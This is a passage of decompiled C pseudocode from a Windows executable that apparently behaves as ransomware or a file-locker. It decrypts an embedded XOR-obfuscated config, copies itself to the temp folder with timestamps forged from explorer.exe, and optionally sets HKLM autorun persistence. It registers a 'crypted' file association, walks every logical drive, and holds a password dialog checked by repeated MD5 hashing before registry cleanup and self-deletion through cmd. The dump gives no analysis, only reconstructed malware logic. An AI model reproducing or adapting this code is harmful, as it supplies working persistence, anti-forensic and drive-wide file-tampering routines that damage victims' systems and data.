            ExitProcess(0);
          }
          --dword_407525;
          if ( GetDlgItemTextA(hWnd, 700, (LPSTR)&pbData, 257) != 0 )
          {
            v4 = lstrlenA((LPCSTR)&pbData);
            sub_401F15(&pbData, v4, &byte_406565, 0x10u);
            sub_401F15(&byte_406565, 0x10u, &byte_406575, 0x10u);
            sub_401F15(&byte_406575, 0x10u, &byte_406565, 0x10u);
            sub_401F15(&byte_406565, 0x10u, &byte_406575, 0x10u);
            sub_401F15(&byte_406575, 0x10u, &byte_406565, 0x10u);
            v5 = 16;
            v6 = &byte_406565;
            v7 = (char *)&unk_406DC9;
            while ( 1 )
            {
              v8 = *v6++;
              v9 = *v7++;
              if ( v8 != v9 )
                break;
              if ( --v5 == 0 )
              {
                sub_401216();
                sub_4021C0();
                sub_40214B();
                ExitProcess(0);
              }
            }
          }
          if ( byte_40752D == 1 )
            MessageBoxA(hWnd, &byte_4040CA, &byte_4040BB, 0x10u);
          else
            MessageBoxA(hWnd, aPasswordIsInco, aError, 0x10u);
          break;
        default:
          break;
      }
      break;
    case 1u:
      if ( dword_407525 == 0 )
        dword_407525 = -1;
      lstrcpyA(lf.lfFaceName, aTahoma);
      lf.lfHeight = -11;
      lf.lfWidth = 0;
      lf.lfWeight = 500;
      ::wParam = (WPARAM)CreateFontIndirectA(&lf);
      if ( byte_40752D == 1 )
        v10 = sub_401EAB(&byte_404414, hWnd, 6, 5, 200, 17, nullptr);
      else
        v10 = sub_401EAB(aPassword, hWnd, 6, 5, 200, 17, nullptr);
      SendMessageA(v10, 0x30u, ::wParam, 1);
      dword_40776E = (int)sub_401EE0(&byte_404426, hWnd, 5, 50, 175, 25, (HMENU)0x1F4);
      SendMessageA((HWND)dword_40776E, 0x30u, ::wParam, 1);
      dword_407776 = (int)sub_401EE0(asc_404429, hWnd, 185, 50, 50, 25, (HMENU)0x1F6);
      SendMessageA((HWND)dword_407776, 0x30u, ::wParam, 1);
      dword_40776A = (int)sub_401E73(byte_40444B, 5, 20, 285, 23, hWnd, (HMENU)0x2BC);
      SendMessageA((HWND)dword_40776A, 0x30u, ::wParam, 1);
      if ( byte_40752D == 1 )
        v11 = sub_401EE0(&byte_40442D, hWnd, 240, 50, 50, 25, (HMENU)0x1F5);
      else
        v11 = sub_401EE0(aExit, hWnd, 240, 50, 50, 25, (HMENU)0x1F5);
      dword_407772 = (int)v11;
      SendMessageA(v11, 0x30u, ::wParam, 1);
      if ( byte_40752B == 1 )
        MessageBoxA(nullptr, lpText, nullptr, 0x10u);
      break;
    case 0xFu:
      BeginPaint(hWnd, &Paint);
      EndPaint(hWnd, &Paint);
      return 0;
    case 0x10u:
      ExitProcess(0);
    case 2u:
      ExitProcess(0);
    default:
      break;
  }
  return DefWindowProcA(hWnd, Msg, wParam, lParam);
}
// 407525: using guessed type int dword_407525;
// 40752B: using guessed type char byte_40752B;
// 40752D: using guessed type char byte_40752D;
// 40776A: using guessed type int dword_40776A;
// 40776E: using guessed type int dword_40776E;
// 407772: using guessed type int dword_407772;
// 407776: using guessed type int dword_407776;

//----- (00401E5D) --------------------------------------------------------
unsigned int __stdcall sub_401E5D(unsigned int a1, unsigned int a2)
{
  return (a2 >> 1) - (a1 >> 1);
}

//----- (00401E73) --------------------------------------------------------
HWND __stdcall sub_401E73(LPCSTR lpWindowName, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu)
{
  return CreateWindowExA(
           0x200u,
           aEdit,
           lpWindowName,
           0x50000180u,
           X,
           Y,
           nWidth,
           nHeight,
           hWndParent,
           hMenu,
           hInstance,
           nullptr);
}

//----- (00401EAB) --------------------------------------------------------
HWND __stdcall sub_401EAB(LPCSTR lpWindowName, HWND hWndParent, int X, int Y, int nWidth, int nHeight, HMENU hMenu)
{
  return CreateWindowExA(
           0,
           aStatic,
           lpWindowName,
           0x50000000u,
           X,
           Y,
           nWidth,
           nHeight,
           hWndParent,
           hMenu,
           hInstance,
           nullptr);
}

//----- (00401EE0) --------------------------------------------------------
HWND __stdcall sub_401EE0(LPCSTR lpWindowName, HWND hWndParent, int X, int Y, int nWidth, int nHeight, HMENU hMenu)
{
  return CreateWindowExA(
           0,
           aButton,
           lpWindowName,
           0x50000000u,
           X,
           Y,
           nWidth,
           nHeight,
           hWndParent,
           hMenu,
           hInstance,
           nullptr);
}

//----- (00401F15) --------------------------------------------------------
BOOL __stdcall sub_401F15(BYTE *pbData, DWORD dwDataLen, BYTE *a3, DWORD pdwDataLen)
{
  BOOL result; // eax
  HCRYPTHASH phHash; // [esp+0h] [ebp-8h] BYREF
  HCRYPTPROV phProv; // [esp+4h] [ebp-4h] BYREF

  result = CryptAcquireContextA(&phProv, nullptr, nullptr, 1u, 0xF0000000);
  if ( result > 0 )
  {
    result = CryptCreateHash(phProv, 0x8003u, 0, 0, &phHash);
    if ( result > 0 )
    {
      CryptHashData(phHash, pbData, dwDataLen, 0);
      CryptGetHashParam(phHash, 2u, a3, &pdwDataLen, 0);
      CryptDestroyHash(phHash);
      return CryptReleaseContext(phProv, 0);
    }
  }
  return result;
}

//----- (00401F87) --------------------------------------------------------
BOOL sub_401F87()
{
  HRSRC ResourceA; // eax
  DWORD v1; // eax
  HGLOBAL Resource; // eax
  char *v3; // eax
  char *v4; // edi
  int v5; // edx
  int v6; // ecx
  SIZE_T v7; // ebx
  char *v8; // edi
  LPVOID v9; // eax
  SIZE_T *v10; // edi
  SIZE_T v11; // ebx
  SIZE_T *v12; // edi
  const CHAR *v13; // eax
  SIZE_T *v14; // edi
  SIZE_T v15; // ebx
  SIZE_T *v16; // edi
  const CHAR *v17; // eax
  SIZE_T v18; // edi
  HRSRC hResInfo; // [esp+4h] [ebp-10h]
  DWORD v21; // [esp+8h] [ebp-Ch]
  HGLOBAL hResData; // [esp+Ch] [ebp-8h]

  ResourceA = FindResourceA(nullptr, (LPCSTR)0xE, (LPCSTR)2);
  if ( ResourceA != nullptr )
  {
    hResInfo = ResourceA;
    v1 = SizeofResource(nullptr, ResourceA);
    if ( v1 != 0 )
    {
      v21 = v1;
      Resource = LoadResource(nullptr, hResInfo);
      if ( Resource != nullptr )
      {
        hResData = Resource;
        v3 = (char *)LockResource(Resource);
        if ( v3 != nullptr )
        {
          v4 = v3;
          RtlMoveMemory(dword_406DB9, v3, 16);
          v4 += 16;
          sub_40211B(v6, v5, v4, v21 - 16);
          v7 = *(_DWORD *)v4;
          v8 = v4 + 4;
          v9 = HeapAlloc(hHeap, 8u, v7);
          if ( v9 != nullptr )
          {
            dword_407519 = (int)v9;
            RtlMoveMemory(v9, v8, v7);
            v10 = (SIZE_T *)&v8[v7];
            v11 = *v10;
            v12 = v10 + 1;
            v13 = (const CHAR *)HeapAlloc(hHeap, 8u, v11);
            if ( v13 != nullptr )
            {
              lpText = v13;
              RtlMoveMemory(v13, v12, v11);
              v14 = (SIZE_T *)((char *)v12 + v11);
              v15 = *v14;
              v16 = v14 + 1;
              v17 = (const CHAR *)HeapAlloc(hHeap, 8u, v15);
              if ( v17 != nullptr )
              {
                lpSubKey = v17;
                RtlMoveMemory(v17, v16, v15);
                v18 = (SIZE_T)v16 + v15;
                RtlMoveMemory(&unk_406DC9, v18, 16);
                v18 += 16;
                RtlMoveMemory(&byte_407529, v18, 5);
                v18 += 5;
                RtlMoveMemory(byte_406DD9, v18, 16);
                v18 += 16;
                RtlMoveMemory(byte_406DE9, v18, 16);
                v18 += 16;
                RtlMoveMemory(&dword_407525, v18, 4);
                v18 += 4;
                RtlMoveMemory(&dword_4065A5, v18, 4);
                v18 += 4;
                RtlMoveMemory(&lDistanceToMove, v18, 4);
                RtlMoveMemory(&nNumberOfBytesToRead, v18 + 4, 4);
                return FreeResource(hResData);
              }
            }
          }
        }
      }
    }
  }
  JUMPOUT(0x402330);
}
// 401F9D: control flows out of bounds to 402330
// 401FFB: variable 'v6' is possibly undefined
// 401FFB: variable 'v5' is possibly undefined
// 4025DA: using guessed type int __stdcall RtlMoveMemory(_DWORD, _DWORD, _DWORD);
// 4065A5: using guessed type int dword_4065A5;
// 406DB9: using guessed type _BYTE dword_406DB9[16];
// 407519: using guessed type int dword_407519;
// 407525: using guessed type int dword_407525;
// 407529: using guessed type char byte_407529;

//----- (0040211B) --------------------------------------------------------
int __userpurge __spoils<ecx> sub_40211B@<edx>(int a1@<ecx>, int a2@<edx>, char *a3, int a4)
{
  char *v4; // esi
  char *v5; // edi
  int result; // edx
  int v7; // ecx
  char v8; // al

  v4 = a3;
  v5 = a3;
  result = 0;
  v7 = a4;
  if ( a4 != 0 )
  {
    do
    {
      if ( result == 16 )
        result = 0;
      v8 = *v4++;
      *v5++ = dword_406DB9[result++] ^ v8;
      --v7;
    }
    while ( v7 != 0 );
    return a2;
  }
  return result;
}
// 406DB9: using guessed type _BYTE dword_406DB9[16];

//----- (0040214B) --------------------------------------------------------
HINSTANCE sub_40214B()
{
  GetEnvironmentVariableA("ComSpec", File, 0x200u);
  lstrcpyA(Parameters, "/c del \"");
  lstrcatA(Parameters, Filename);
  lstrcatA(Parameters, "\" >> NUL");
  return ShellExecuteA(nullptr, nullptr, File, Parameters, nullptr, 0);
}

//----- (004021C0) --------------------------------------------------------
LSTATUS sub_4021C0()
{
  return RegDeleteKeyA(HKEY_CLASSES_ROOT, lpSubKey);
}

//----- (004021D1) --------------------------------------------------------
WPARAM __userpurge start@<eax>(int a1@<ebp>, int a2, int a3, int a4, int a5)
{
  unsigned int SystemMetrics; // eax
  unsigned int v6; // eax
  HWND Window; // eax
  DWORD LogicalDrives; // eax
  int i; // ecx
  unsigned int v12; // [esp-74h] [ebp-74h]
  unsigned int v13; // [esp-70h] [ebp-70h]
  struct tagMSG v14; // [esp-64h] [ebp-64h] BYREF
  WNDCLASSEXA v15; // [esp-48h] [ebp-48h] BYREF
  int v16; // [esp-18h] [ebp-18h]
  int v17; // [esp-14h] [ebp-14h]
  HINSTANCE v18; // [esp-10h] [ebp-10h]
  int v19; // [esp-Ch] [ebp-Ch]
  int v20; // [esp-8h] [ebp-8h]
  int v21; // [esp-4h] [ebp-4h]

  hHeap = GetProcessHeap();
  sub_401F87();
  GetTempPathA(0x200u, Buffer);
  lstrcpyA(String, Buffer);
  GetModuleFileNameA(nullptr, Filename, 0x500u);
  lpBuffer = HeapAlloc(hHeap, 8u, nNumberOfBytesToRead);
  sub_4017B4((unsigned int *)dword_406DB9);
  sub_402472();
  lstrcatA(String, byte_406DD9);
  lstrcatA(String, aExe);
  if ( CopyFileA(Filename, String, true) )
  {
    hFile = CreateFileA(String, 0x40000000u, 2u, nullptr, 3u, 0, nullptr);
    SetFileTime(hFile, &CreationTime, &LastAccessTime, &LastWriteTime);
    CloseHandle(hFile);
    if ( byte_407529 == 1 )
      sub_402422(HKEY_LOCAL_MACHINE, SubKey, ValueName, String);
    sub_402342();
    byte_406550 = 0;
    SetErrorMode(1u);
    LogicalDrives = GetLogicalDrives();
    for ( i = 25; ; --i )
    {
      if ( (LogicalDrives & (1 << i)) != 0 )
      {
        BYTE1(dword_40444F) = i + 65;
        *(int *)((char *)&dword_40444F + 2) = 774528058;
        byte_404455 = 42;
        byte_404456 = 0;
        v21 = LogicalDrives;
        v20 = i;
        sub_4013A8();
        i = v20;
        LogicalDrives = v21;
      }
      if ( i < 1 )
      {
        sub_401000();
        GlobalFree((HGLOBAL)lpBuffer);
        ExitProcess(0);
      }
    }
  }
  InitCommonControls();
  hInstance = GetModuleHandleA(nullptr);
  dword_40775E = (int)GetCommandLineA();
  v21 = 10;
  v20 = dword_40775E;
  v19 = 0;
  v18 = hInstance;
  v17 = 4200863;
  v16 = a1;
  v15.cbSize = 48;
  v15.style = 8195;
  v15.lpfnWndProc = sub_401AB9;
  v15.cbClsExtra = 0;
  v15.cbWndExtra = 0;
  v15.hInstance = hInstance;
  v15.hbrBackground = (HBRUSH)16;
  v15.lpszMenuName = nullptr;
  v15.lpszClassName = ClassName;
  v15.hCursor = LoadCursorA(nullptr, (LPCSTR)0x7F00);
  v15.hIconSm = nullptr;
  v15.hIcon = nullptr;
  RegisterClassExA(&v15);
  SystemMetrics = GetSystemMetrics(0);
  v13 = sub_401E5D(0x12Cu, SystemMetrics);
  v6 = GetSystemMetrics(1);
  v12 = sub_401E5D(0x69u, v6);
  if ( byte_40752D == 1 )
    Window = CreateWindowExA(
               0x40180u,
               ClassName,
               &Caption,
               0x10000000u,
               v13,
               v12,
               300,
               105,
               nullptr,
               nullptr,
               v18,
               nullptr);
  else
    Window = CreateWindowExA(
               0x40180u,
               ClassName,
               WindowName,
               0x10000000u,
               v13,
               v12,
               300,
               105,
               nullptr,
               nullptr,
               v18,
               nullptr);
  hWnd = Window;
  UpdateWindow(Window);
  while ( GetMessageA(&v14, nullptr, 0, 0) )
  {
    TranslateMessage(&v14);
    DispatchMessageA(&v14);
  }
  return v14.wParam;
}
// 4021D1: could not find valid save-restore pair for ebp
// 40444F: using guessed type int dword_40444F;
// 404455: using guessed type char byte_404455;
// 404456: using guessed type char byte_404456;
// 406550: using guessed type char byte_406550;
// 406DB9: using guessed type _BYTE dword_406DB9[16];
// 407529: using guessed type char byte_407529;
// 40752D: using guessed type char byte_40752D;
// 40775E: using guessed type int dword_40775E;

//----- (00402342) --------------------------------------------------------
LSTATUS sub_402342()
{
  lstrcpyA(byte_4065B9, asc_404032);
  lstrcatA(byte_4065B9, lpSubKey);
  sub_402422(HKEY_CLASSES_ROOT, byte_4065B9, byte_40444B, byte_406DE9);
  sub_402422(HKEY_CLASSES_ROOT, byte_406DE9, byte_40444B, aCrypted);
  lstrcpyA(byte_4065B9, byte_406DE9);
  lstrcatA(byte_4065B9, aDefaulticon);
  lstrcatA(String, a0);
  sub_402422(HKEY_CLASSES_ROOT, byte_4065B9, byte_40444B, String);
  lstrcpyA(byte_4065B9, byte_406DE9);
  lstrcatA(byte_4065B9, aShellOpenComma);
  byte_40594E[lstrlenA(String)] = 0;
  return sub_402422(HKEY_CLASSES_ROOT, byte_4065B9, byte_40444B, String);
}

//----- (00402422) --------------------------------------------------------
LSTATUS __stdcall sub_402422(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, LPCSTR lpString)
{
  DWORD v4; // eax
  HKEY phkResult; // [esp+0h] [ebp-8h] BYREF
  DWORD dwDisposition; // [esp+4h] [ebp-4h] BYREF

  RegCreateKeyExA(hKey, lpSubKey, 0, Class, 0, 0x2001Fu, nullptr, &phkResult, &dwDisposition);
  v4 = lstrlenA(lpString);
  RegSetValueExA(phkResult, lpValueName, 0, 1u, (const BYTE *)lpString, v4);
  return RegCloseKey(phkResult);
}

//----- (00402472) --------------------------------------------------------
BOOL sub_402472()
{
  HANDLE hFile; // [esp+0h] [ebp-4h]

  GetWindowsDirectoryA(byte_40755E, 0x200u);
  PathAddBackslashA(byte_40755E);
  lstrcatA(byte_40755E, aExplorerExe);
  hFile = CreateFileA(byte_40755E, 0x80000000, 1u, nullptr, 3u, 0, nullptr);
  GetFileTime(hFile, &CreationTime, &LastAccessTime, &LastWriteTime);
  return CloseHandle(hFile);
}

// nfuncs=98 queued=27 decompiled=27 lumina nreq=0 worse=0 better=0
// ALL OK, 27 function(s) have been successfully decompiled
